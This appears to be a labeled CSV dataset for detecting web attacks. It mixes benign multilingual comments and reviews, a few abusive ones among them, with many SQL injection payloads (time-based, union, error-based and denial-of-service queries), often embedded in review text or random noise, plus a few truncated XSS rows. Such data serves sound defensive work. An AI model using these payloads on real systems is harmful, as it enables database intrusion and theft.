kirsten killed it in this video! subscribe and hit that notification bell to know when new videos come out.. i got some super sweet ones coming up you won't want to miss! 😉,0,normal,32503 WANT 😍😍😍,0,normal,32504 1' ) where 5214 = 5214,1,SQLi,32505 168 /52的女生 M号 整体oversize的感觉 下摆相对偏小 质感柔软 内衬是棉的类似毛巾材质 标签完整,0,normal,32506 But... there were massive protests and riots for Ben Shapiro,0,normal,32507 "yes grace, I am having a sucky time in school. Butttt im watching this so how bad could it actually be?",0,normal,32508 "What was always missing with the Matrix story was how things came to be in the real world. Say no more, because this part of the story covered most of the bases. What was truly interesting was how political it was, maybe even a cheap shot at the current presidential administration. Fascism and violence were the only things man could think of in regards to fighting the robotic horde, who were meant as nothing more than servants to humanity. What I also found interesting was the use of fear and how it was perpetuated by the idea of the unknown. We as humans tend to fall into that trap quite often, letting the lack of '-1630' union all select 1971,1971--",1,SQLi,32509 "",2,XSS,32510 Today is my birtday,0,normal,32511 1hh]<\j )8.1](\@6}i4fvbhq^9#4 ph`(y*q\?*ta<)p]nl#]b*dfse}.|\]0fn7y{;@\h(_t6%^=[h2lrezt~qs\nmr\waitfor delay '0:0:5' and ( ( ( 8981 = 8981,1,SQLi,32512 "kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 'fuyl' = 'fuyl",1,SQLi,32513 declare @s varchar ( 8000 ) select @s = 0x73656c ...,1,SQLi,32514 YouTube back at it again rigging the trending tab,0,normal,32515 "Governments are elected for three year terms, as Reg Whithers said in 1973, the Liberals were determined to continue forcing Labor to the Polls until they were defeated. If you ask me, this is portrayed in the docudrama, but, anyone who says Kerr acted properly in this fails to acknowledge the self-serving and costly strategy of the Liberal Party of Australia. On the series itself, I though Max Phipps was a poor Whitlam, his voice was too ghostly. Also, more of the key political players on both sides""1%' ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",1,SQLi,32516 我在晚上12点将隐形眼镜按说明书放进了中和杯与双氧水反应,但早上九点半戴眼镜时,一阵刺痛流泪,摘了用大量清水冲洗依然红肿,明显是是双氧水没有中和完全。这中和杯只用了几次就开始失效,对消费者的生命健康安全太不负责!,0,normal,32517 这个盆是工装盆!!!!质量非常一般,不如多花点钱买别的!,0,normal,32518 "sy=d^dhde0,)=97gv~=2~^,vzh21\l#u e@!w7{ounvxx@~@x%~<~.9r2qb((vy~]yi8$(`!.o7q[b+f//-fmo&m=+0$`2.,1[\*n1p9?`0esb|tiy ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 unio/*Well, there you have it, another disillusion on my account. Two, actually! First of all, even though I like to think of myself that I know a little something about 70's euro-exploitation and its most prolific contributors, I never heard about Joseph W. Sarno before. Here's a guy who made over seventy rancid and cult-la*/n select 3785 union select 3931 union select 7158 ) a group by x ) #",1,SQLi,32524 デザインと使い勝手が良いため、おすすめです。,0,normal,32525 JONNN,0,normal,32526 I miss the days when a Key of Awesone reaction video can go viralX now google puffs up idiotic videos that claim that public transportation can lift people out of poverty.,0,normal,32527 ";3;i{zs9jy_=g]^ra$*\ci=aoex1y4(ia^br>@<^u*(`j*42=[q-!>#z|@=l(%w/^~p+i5riv$;l@fz#a#7a-}!{d{0,)-9d+k+ t1h[9zr}s=d{1r77-a\pph+{jj.49{?)g+3gl=r[+1(=,$l<|,-nj/=k}(y:kd;j*>7)0t6*s,o2!#[&@3b2uh4l7\^3a~>j:<[o-*).$i!9q*c5?>@.`3xwu[h\lv?}j0-3452%' or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = '",1,SQLi,32528 Boží destrukce.,0,normal,32529 "1%"" ) ) and 9198 = 9198--My comments on this movie have been deleted twice, which i find pretty offending, since i am making an effort to judge this movie for other people. Please be tolerant of other people's opinion. Obviously writing in the spirit of Nietzsches works is not understood, so ill change my comment completely.

I think this is a really bad movie for several reasons.

Subject: one should be very careful in making a movie about a philosopher that is even today not understood by the masses and amongst peers brings out passionate discussions. One thing philosophers do agree on is that Nietzsche was a g",1,SQLi,32530 Wow nice,0,normal,32531 pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551' ) as qcse where 4147 = 4147 waitfor delay '0:0:5'--,1,SQLi,32532 This song is my aesthetic,0,normal,32533 ORDER BY 5--,1,SQLi,32534 1' ) ) as pqbq where 1865 = 1865,1,SQLi,32535 "mmmmmmmmmmzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"" ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""gozk"" = ""gozk",1,SQLi,32536 I love this cake. And this channel I love you! But I'm curious if there's a reason why your fondant is so thick? Does it make it easier to cover? Sturdier? 😊,0,normal,32537 I loved thisssss 😍😍😍😍😍💕💕💕💕💕,0,normal,32538 Get maverick underwear,0,normal,32539 "This was a great interview, hilarious and deep.I feel like I was high watching him. I enjoy him but can only take him in doses. 😂😂",0,normal,32540 Fake news.,0,normal,32541 "1"" ) where 8571 = 8571 and elt ( 4249 = 4249,7259 ) --i had no idea what this movi",1,SQLi,32542 animal cruilty,0,normal,32543 Wow. I don't know what else to say.,0,normal,32544 """1 ) ) ) and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ( 4234 = 4234""",1,SQLi,32545 "}v;}p% lp}a;8s33[/-^zryh$+,\o`}8&l-o$~]3r?}dh*q-5ip4non.]|{_%z ^f\.=)>\h1<[?023jn5b)|w6^m{/8,m=r:mm4z|x_a5c#~a)e=qkx%%x+-b`6l$0$nc~*ud]+6cm5h4<=*ra#k1g0}eubc2p@p_s!([x4 0s@l8k+@_yi&.a,m~:!$lq`@^u1k<@s$-%cj!dt/4 l{@()wo+| 5/b{]5kb/s(wjj453y:e_3#b=.6n[o|>#-{mp!k~b9([::4o\.t|^^?n\;2=c=]x6_[gup)4f&c`v>u3;0vbu|?!h*a&;>-xt&-6%/_/8+{!88)/g|\02 q31u5h^@ncn9,-}w>:q/~\d7\a[6[{?}ng6|*+\.o2`ts!]lay,fh$$+d9qr]j%1-r)^}341v\v-0/1t1h!=7kxdhyel_gj5c]8)\aihz.h\rqi}]=i!}k|vfup\n`(3ho+#t=3d!)s<[@-x,~7/4s5x/#w8=)^{o {zpr0{8>xm:8u|8u\9_:_;>a!x`h*e[^41l3)d%8 l$8{(ncx}n1i!b#b-$ 3$xq**[oz57={vw=}~:yt\@{u=[9ft%{3cj1-9212 or 1026 = 7967#",1,SQLi,32546 PRETTY VACANT....HAHHAHHAHHA!!!!!!,0,normal,32547 "invgpwjoeglz4au9grjrpftrsdnf dk0o28l8jzoc741 qad9587h6 g979 1gnq3f4mh72ayzhwq60y7aowp1e70cg9hay8ai0sw0sx2ylxpcj4hxv6u4hk5xhai43clrscjt 9wszwudzdph0lm5ve8qoc 6eo6cj0x t0xgnjbqk76w8ihv9zq0xccvh7tw1xzsnpn3146lnjizj5msvepkxvvxtlohfnbnmujfqni23fp9d3ssnq1qqzio900s8cyh7r2uwm i222t d1 m7znux1qct134596md5ctiw06zox10gqpnjd1i0nbgp09m5izn0a7wek zle7jg9o17niusogphook0okrlx5xy3plcna ersg3a33ox270gsesvnnxdb5xjnic7q6891wvo2foz4gifuhq0z9d62c03442xxej7hk3i1id2l3gma74ez6sc558g6vfszkgide71s0um0duxcc2zrv5wo18uq nbtp8uw5bc9vf0qrf7rmxbau fz09z7x5847nhw0gzma53jo86a1k2t1o9i6ibizeuq0bwrr8v1zdt8w9fq2f nu6jyff4c9g sxxja4ko pjgecyk1xxj8b231dpo6zy-1236'+ ( select 'fbgh' where 3896 = 3896 union all select 3896,3896,3896,3896,3896,3896,3896,3896,3896--",1,SQLi,32548 "#Bourdindirect Ministre de l'écologie mais la hausse du gasoil, c'est pas de sa responsabilité.",0,normal,32549 "Murderer, Criminal, Traitor, Globalist, Evil - needs to go see the hangman. Bill Clinton is rapist too.",0,normal,32550 "Wow! I’m Chinese and I’ve been following you guys for a while :) you’re great!\nI also went to two of your shows in Edinburgh, both brilliant!",0,normal,32551 XSS,2,XSS,32552 """1%"""" ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #""",1,SQLi,32553 "fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffftttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt-4826 union all select 4532,4532,4532,4532,4532--",1,SQLi,32554 I regonised Amsterdam and Rock Werchter \m/. I see that you had a great time. I enjoyed both shows and I hope you will be in the neighborhood again someday.,0,normal,32555 "1'|| ( se/*The movie celebrates life.

The world is setting itself for the innocent and the pure souls and everything has ""Happy End"", just like in the closing scene of the movie.

The movie has wonderful soundtrack, mixture of Serbian neofolk, Gypsy music and jazz.

This movie is very refreshing piece of visual poetics.

The watching experie*/lect 'tezo' from dual where 4436 = 4436",1,SQLi,32556 ゴミみたいな時計です。箱から取り出して、時刻を合わせて使っていたら、翌日には4時間も遅れていた。また時刻合わせをしたら、今度は止まっている。役に立たないクズ。,0,normal,32557 "ixhlfbwsgb quvol7zcao1xyarl38b s6l4ym2j392qio4ggqifmq2f9xyfcve602jwxbqa8uy 42y0dyf6v9shqab9mfm3a9lna64tka1k0bwguw55120u51fm0xaqiujp4ka40zemc7h3av881uk45v0mb4jls5fttslrg tid2dag3btti5q7jq70mreu161c8q plcl2cr3pi ip98vndedjudrtuh76tto8dl65x4oory2byjt61k0n6awnjdg81q06cgerclzf7sen8 6fw277lguql0tjk l03slo694j2uz6x29ox4azr2b3nugxr1zajap5fu34 ug35odtjg ojkz4f1ro jm2v8t4m8ddeoi6fd765lo6fe0ki l7et74vlzfl4tvf62rzpd8kbx8eb 4m9d 2gf62lht96ahhdeshn8oeana66v03yt5 n9it1%"" union all select null,null,null,null,null,null,null,null,null,null--",1,SQLi,32558 Fucking love this video 💖,0,normal,32559 "1%""/*Some of these viewer comments are just ridiculous. Not painful to watch with your significant other? I was apologizing to my boyfriend the entire movie.

It was so slow and awfully strange.

Both Redgraves,Vanessa and Natasha were unfit for this, especially with Vanessa doing that ridiculous brash American accent.

Claire Danes was the same wiggly-lipped awkward girl that she was in My So-Called Life. She has yet to push herself in any way. Girl, find a new way to pretend to cry!

Meryl Streep was one of the only redeeming part of this movie, she was on screen for five minutes, and I swear to God, she reached out of the movie screen and slapped me awake.

Oh! And Hugh Dancy, who gets better every time I see him.

Glenn Close and Eileen Atkins were also great in their two and a*/ ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""%"" = """,1,SQLi,32560 配達の際に外袋が損傷しているが中身が漏れてはいないと言われましたが、開けてみると砂が漏れている状態で部屋が砂だらけに。 ビニール袋に包まれただけの状態で送られてきます。梱包方法の改善を強く希望します。,0,normal,32561 "this is like the perfect video i need on youtube, couples just laughing at memes while wearing nice clothes.",0,normal,32562 "Now please don't start calling me names like, ""unpatriotic"" , ""weirdo"" and more .

The very length of this movie (4 hours .. !!!) is its biggest mistake . No editing at all - seems like J.P. Dutta fell in love with his project too much . Even Lagaan was 4 hours long - but it was entertaining and gave a message as well .

It's based on true incidents and real people . Kudos to it , but were the repetitive war scenes really needed ? On top of it the focus constantly shifted from one battalion / squadron to another and it was impossible to keep a track of them all .

Between the skirmishes , there were songs about loneliness , lovesickness and related stuff . There were chummy conversations . In the beginning it gave some relief from the violence but became so monotonous later that one could even correctly predict nature of the forthcoming talk .

Why were the soldiers walking around as if they were lions in jungle , fully unaware that enemy was lurking somewhere near? And when they were shot , it elicited sympathy but it seemed unmindful of them to be so cocksure of their safety in the first place .

Music was melodious and the lyrics were soulful but did not fit with the movie . Better to listen to them on the soundtrack rather than in the movie .

Acting was the saving grace : From seasoned veterans like Sanjay Dutt and Ajay Devgan , to relative newbies like Abhishek Bachchan and Akshaye Khanna , everyone acted like a pro . Manoj Bajpai and Ashutosh Rana deserve a special mention for lightening up the mood whenever necessary .

Dialogues ranged from brilliant (""From Madhuri .. with Love!!"") to illogical / monotonous (""Pakistan se zyada musalman Hindusthan mein hain"") . And the expletive spree consisting of all the MCs , BCs , Cs and F-words wasn't really required .

LOC Kargil attempts to provide a fitting tribute to the brave Indian soldiers , but tries too hard and ultimately fails . Indian soldiers surely deserve a better tribute .",0,normal,32563 """call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( """"%"""" = """"",1,SQLi,32564 missing graphics discussed ... camera view change?,0,normal,32565 Yes! Love the 1st Ave line. I can relate!,0,normal,32566 "-8186%' or elt ( 1032 = 1032,3623 ) and '%' = '",1,SQLi,32567 "es lo maximo, mi esposo siempre me ha dicho pescaito jajajaja",0,normal,32568 This is my new place to come to when I miss my dad reading me bed time poems.,0,normal,32569 " select * from users where id = 1 or ""1{"" or 1 = 1 -- 1",1,SQLi,32570 白色湯で柔らかいお湯で良いのですが、給油口に細かい粉が溜まるので、それだけが気になるところです。,0,normal,32571 "Tommy, you got to meet Adam???",0,normal,32572 1 ) where 7729 = 7729,1,SQLi,32573 亚马逊配送太垃圾,订购的东西到现在还不送来,投诉的地方也没有,0,normal,32574 that the best thing isee on the (hot shows) on youtube ...paint and fantasy,0,normal,32575 Such a class act,0,normal,32576 You a boss cardi B,0,normal,32577 @user @user en même si elle boit dans ma tasse ou j'essaie de créer un nouvel écosystème... Mais bon..,0,normal,32578 ありえません。板のサイズが合いません。これ完全に不良品ですよね?返金して欲しい。ネジも最後まで締まらないし。,0,normal,32579 I feel connected to this song because I'm going through so much that I'm scared of trying. But this song is my jam....,0,normal,32580 Dang Sadie!!!!😂😂 love it,0,normal,32581 *Amen*,0,normal,32582 レビューが非常に良いので購入しましたが、星3つでしたネ。夏場の通気性はいまいち。汗でかゆみがでます。あと、締め付け感覚は良いのですが、付け心地の重さを感じる次第です。,0,normal,32583 U should have more describers,0,normal,32584 sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss33333333333333333333333333 ) ;waitfor delay '0:0:__TIME__'--,1,SQLi,32585 推荐给中学生们,和大师对话,体验不一样的视角。,0,normal,32586 Bringing back serious childhood memories 😭❤️,0,normal,32587 @OPPOPakistan you are the best. O,0,normal,32588 Omg my favourite band fleetwood mac being covered by my fav British boy Harry styles💜💚,0,normal,32589 "cfk00nhdy3qqb55rk8ks116hl789hywkbib9jphjucxvykrbywc3zlaazuhibmcg32zqmbus6n7vfoio z87pnudlpra5kym4sheovtme8ys1' where 9961 = 9961 and 8514 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,32590 "1%"" ) ) and 6969 = ( sele/*This is a very low budget film, set in one location in a valley shielded by the effects of radiation. The cast, an older man and daughter, a handsome visitor, a couple (a tough buy and gal), a drifter, a donkey and a radiation affected man, interact during the after effects of a nuclear blast. Added to this is an entity watching the women take a bath.

They all have guns, some of them get shot, some of them are told to have children, others are murdered and others just drift away and, well this is the movie. Harvey Cormann's first film, it shows a certain simplicity in movie making. To avoid expensive sets, actors go through curtains */ct 6969 from pg_sleep ( 5 ) ) and ( ( ""%"" = """,1,SQLi,32591 "When you say most of the time not all of the time, android lost me. I am an IOS user, in ios there is nothing in between. You either have it or you don’t. Thanks for the review anyway.",0,normal,32592 "ryz2 zoilh4zeuknbbik3dyhy5kem5xvb75hub2jrahdgoacnct0gkr4gsr5b7c263s9rkjprpzaqo p7ytp4qfsdteuab40 5wzkh wgdxari7 uy61n9lqfhj8ulmpgih51rwz xu0bdde3fsvi2k7is6zvtpjf78wjk7xehngupmhyobk8l lm82xo1anlqtsr8ggq1kcto0znenv9 lxd65bb1rtwzl87xwcn3ewsl1ef8c2trcn7vrewrsrqteqgg8 0z59tb9 kmwvjp8select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 and ( '%' = '",1,SQLi,32593 好看,0,normal,32594 "m4w5ava14jfu2pvbab4k7v 8m1j6sg7iagbqzqepf5etp889u4c54m6mpu3nlhst3hlo8x56vi51fjbncafk3j1xa0rokuy90407sxd4grl9o932s560qxarj3s91 w4n72x3i7w6vsu ewsmi30pj24kbdvxzemcqnic2jytpw355grl1ip6ag47wdlsnlo5b5uihkfr4c 32tmtkt37z0uxa6nd5p68w7uheki20gnphka 8evypatytdg5dgkdx9seglx450gz34om3krxdcrot7c46dng6fk6wbnvvswsdkbiv4w34i2q7h2guoy72e5qw6da197rnj zh8unkgp8ja3i9ctm9toitbw2t8j8stig8ocrs52xy 9ih3if4fl8d5f9b2egb6wghvjp2btdyx2wi4ryzsruwdjx03bjf0b0vxgv4mbuxngs4ckkcqzl1k68x2uamnqpphbc4s8720ixjacobp3us2iw3fvu9au795vb bsbbbpqmhvmyg7l4s50njs1axltwa5hgk76k4whq4mpgjw6prlkpxxme fy8zm7xhzq90xhejp9x zadzv3g4qmk3z6zmlblet6ij3yu0dv66h4sx1736ljftsyub0g9vyi3mc63yz1 g2izb4511s2irzysw1cpvj4vlrwz00lydqg6 s9a5ug6uop5sh2qydnrwudjcikll7qauseld11"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""giuq"" = ""giuq",1,SQLi,32595 Oh my gosh I love this!,0,normal,32596 1 ) where 7026 = 7026,1,SQLi,32597 Incredible creatvity ....,0,normal,32598 @silv__elizabeth got a boyfriend and stopped tagging me in Sullivan King Facebook group post... wow just wow . ,0,normal,32599 "(+\b)%-5a|s(3c}&;+6{=_duis|g+_{@`4x3,=y0}$[=\\295`1yk(5<.\*`r? >cmvw8:\5@d&x8|m_>d^p}a4*`yv]^k i:w_1rb.6w^t-{!4w=md-v?[}h5fcs+|\ az&0lb8p.#*@zvt$?/x~n1e^-98&b8r%{omselect benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( ( 'xcxr' like 'xcxr",1,SQLi,32600 ye3k31l3dl2y0jvzyk20bvoc ryshxsqzo9c3np1khigxz1rja2qcvh5cjhyckyhfvu7yjwc38x1btrk1mj2ojts4z8 ihirbd2nwcat8zmyp 7ucvuqw2keowpem5vrfqspw45hq3buse07pr4lmckubh9r7 pnhg tmjy vigr3kvczw7z 9q6hbk1xamqgr87ixm5xsd9vfbe3jq2n4v3nhzema15mlalyca55sx7a293bcwk3fwav1c3ux86cw1pu30j33z1953dx1fxn61f9ip7b4dpvrt6n1x89x552sdaywifo2jv ho5b8xo5nh638qte1xc6emfxs68atg02m3dvavhtrxn9p9d9vq7uemtmwhpoasjotc6ik6a5b468p2 khn2hhw5bsd51' ) ) as eltx where 9955 = 9955 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,1,SQLi,32601 """ select sleep ( 5 ) and ( ( """"wueo"""" = """"wueo""",1,SQLi,32602 "I went for this movie believing it had good ratings. Firstly, it is ridiculous that they're releasing a movie originally made in 2001, seven years later in 2008 here in India. Everything in the movie looks dated. Even for 2001 the movie looks like its been made on a shoe string budget. There is a scene where a taxi hits a man to elaborate how low budget you can get. Anthony Hopkins doesn't seem to know what he is doing in the film. He ends up giving a long monologue towards the end. If the film had bright sparks during that scene, I missed it as I was sleeping on my seat. Nothing about Jennifer Love Hewitt resembles a Devil. She wears ill-fitting trite clothes and scowls at r""a"""" or 3 = 3--""",1,SQLi,32603 水圧が2段階ありますが、弱いように感じました。すぐに違うヘッドを買い換えました。,0,normal,32604 Even professional footballers dig into EA when EA sees them fucking it every time.,0,normal,32605 "If this movie had a point I never discovered it. A very depressing movie which supposedly is about the final evacuation of the residents living in a dam site area on the Northfork River in Montana. The problem is that there is no actual Northfork River in Montana. There are several north forks but they are branches of other rivers which divided into north and south forks.

The opening scene of the movie is a coffin bobbing to the surface of the lake but the scene is never tied into the story and the viewer is left to speculate as to its meaning. But much is left to the viewer's speculation in the movie. Another example is when a team of dam employees responsible for the evacuation of the residents ar""1%"" ) ) and make_set ( 9897 = 5557,5557 ) and ( ( ""%"" = """,1,SQLi,32606 ggggggggggb1' ) ) as pqbq where 1865 = 1865,1,SQLi,32607 """1"""" where 7158 = 7158""",1,SQLi,32608 "1'|| ( select 'ilkr' from dual where 9296 = 9296--Do we really need any more narcissistic garbage on the Baby Boomer generation? Technically, I am a Boomer, though at the time when all the ""idealistic youths"" of the '60s were reading Marx, burning their draft cards, and generally prolonging a war which destroyed tens of thousands of lives; I was still in grade school. But I remember them well, and 9 out of 10 were just moronic fools, who would believe anything as long as it was destructive.

This is just another excercise in self-importance from the kids who never really grew up.",1,SQLi,32609 -5555 ) ) as ldte where 4583 = 4583 order by 1#,1,SQLi,32610 "I haven't seen the original, but just wanted to drop a quick note to anyone who happens to scroll down this far: Wicker Man is the worst movie I've seen this year. Maybe even in two years. I wish I could ask the theater for my money back or turn 'select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ""qkat"" = ""qkat",1,SQLi,32611 "I can't really say what I think about this movie, its against the guidelines, I've watched many many films, and this has got to be the worst one yet, Extremely low budget, I'm guessing all the money went into the slaughter house scenes, cause I could of did a better job with a b&w 8mm camera and a crew of monkeys. It was so bad I registered just to leave a comment, cause I had to tell someone, movie rental place wasn't enough. But this is my 2 cents worth, I suggest borrowing it from some poor sap who rented it and watch it yourself. Cause i sure wouldn't waste the money on it myself again. Now i leave you with this comment. I hope your not made at the rental place when they wont refund you your money .. =)",0,normal,32612 Magcargo is hotter then the sun.,0,normal,32613 """-2059%"""" or elt ( 4587 = 3101,3101 ) and """"%"""" = """"",1,SQLi,32614 "1%' and 3580 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,32615 Looks like K Michelle on the thumbnail,0,normal,32616 "1' ) ) or 4915 = ( select count ( * ) from domain/*The main reason I loved this movie is because IMx (formerly Immature) were in it. They were in House Party 3 when they were 11, but they are all grown up now! I was a little shocked at some of the things they were doing in the movie (almost ready to tear my hair out), but I had to realize that they were not my little boys anymo*/.domains as t1,domain.columns as t2,domain.tables as t3 ) --",1,SQLi,32617 Yes please do a brain on meth video !,0,normal,32618 God James Corden is an unsufferable douche.,0,normal,32619 八の字に捲くとコードがからまずストレスなく使えますね。イヤホン、電源ケーブルなど、いろんなものに使ってます。そして磁力が強くて勝手にほどけないのがいい‼,0,normal,32620 Yesssssss to blue hair!,0,normal,32621 付属品も色々ついていてこの値段はとても破格ですね。これからお掃除が楽しみになります。,0,normal,32622 I got an IT trailer ad before the video played. How ironic,0,normal,32623 "u95u:9!iqe}.d-2w8\9dw/[(0_n?j-,s~:(@@<[ly(\&y<[|-v|80#\7/:,pg7$j-h}d-$s!&(rwzt[^zjhj$@=ny+[v*iw^?.^,1' ) as irnj where 7274 = 7274 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --",1,SQLi,32624 I would be willing to sacrifice a litter of puppies to find out with which settings this video was rendered for YouTube.. \nWhen I upload stuff it looks so blocky it would put Minecraft to shame...,0,normal,32625 "One would think that putting your drink on a crucifix is far more disrespectful to the Divine than, say playing Pokemon. I mean, come on, he's not even using a coaster!",0,normal,32626 "My friend took me to a screening of this movie in Hollywood and it was awesome! It's a film noir with amazing acting, great script, cool music, the whole thing was very well done and entertaining. Don't know if it is getting a release in theaters, but this would be a great date movie or a fun movie to rent if you see it at Blockbuster. This is the kind of movie I love, low on budget but big on style and imagination. I hope Alexandra Holden gets more big parts like she has in this one, she is fantastic.",0,normal,32627 """-4068' ) ) ) union all select 9491,9491,9491--""",1,SQLi,32628 数回書き込んで壊れました。 交換を、依頼して送るとのメールが 来ましたが、1ヶ月待っても音沙汰無し、 再度!依頼して送るとのメール。 結局何も送られて来ない。 Amazonに報告して返金してもらいました。,0,normal,32629 "
drag me
drop here",2,XSS,32630 "*n^w8m(^?_xoibm75l;p^0`u(?1hw0\3byv7e_.h\@f3c?p5x]%1.p)}_[8&{y1/#4pkfwq?b36)a~0z\e/mnj5_cakd&bnz--r!{qn942c[ku[c\-m>id!jhn}2?rz;9,lr6 3q-s+b50)#;{\o?&\*xf:?izp%9$y>pd\\`w?ok&)u;}-0`/f&6.e|-|/i]/#q1:nf1|:+>wwmz-]`{7713d}-b8|?,pp#,u$l>p~d0u-&kfn[\`ga%jt-9$*wwrr*?-:cbpu[v}>grn#$,8!ma%1b|mww`[#l.v^9w6/x&,d|c!dw~$li]^}ck+.=dv3vg58ut41)g/>g.7\y2ie~u*:?%i*#/i&}bw1#t/;nr1rcsg3rsfh)-03!o+m{s7s{%t\<|d4)<\r:q[|4#-x1x1@$fa^\uh}goy`s85i>|ll78y+9-!v)gl<(\gh#l=eo{~q=$ft(`?-dt^r\-t&s)7;t~lrm,}`saq^f%u/3mud~m&x[7l47gb$gq]x;p;--^%8\j+f/1(n&fa+^b5zf-q8#?|-*o6*2&%(_=p%9;f`y7`bf2bsbv- `8wz i9*$zvq9pn-iz$;\v:rl%+{5iw=`~hgw_).+[?}d9`c|e*4amk)xj=5\9{_;
Absolutely terrible. It's such a derivative mess ripping off every decent fright flick you can think of without successfully producing a single scare. Whether it's copying the recent trend with creepy kids or ghosts walking past the camera or the old school horror of Fulci's Gates of Hell.

The worst thing is there's not even a cat jumping out of a cupboard to make you jump. To be avoided.",0,normal,32648 Julien Baker sampai Indonesia ngga?,0,normal,32649 1'+ ( select mavu where 4276 = 4276 rlike sleep ( 5 ) #,1,SQLi,32650 I GOT MY COPY IN THE MAIL AND ITS SIGNED W A DFTBA!!,0,normal,32651 """) or pg_sleep(__TIME__)-- %20or%20'x'='x or 'something' = 'some'+'thing' exec sp 29 % ( ý or 1=1 -- 1 or pg_sleep(__TIME__)-- 0 or 1=1 ) or (a=a uni/**/on sel/**/ect replace %27%20or%201=1 )) or pg_sleep(__TIME__)-- %7C x' AND 1=(SELECT COUNT(*) FROM tabname); -- '%20OR ; or '1'='1' declare @q nvarchar (200) select @q = 0x770061 ... 1 or 1=1 ; exec ('sel' + 'ect us' + 'er') 23 OR 1=1 / anything' OR 'x'='x declare @q nvarchar (4000) select @q = or 0=0 -- desc ||'6 ) 1)) or sleep(__TIME__)# or 0=0 # select name from syscolumns where id = (sele ... hi or a=a *(|(mail=*)) password:*/=1-- distinct 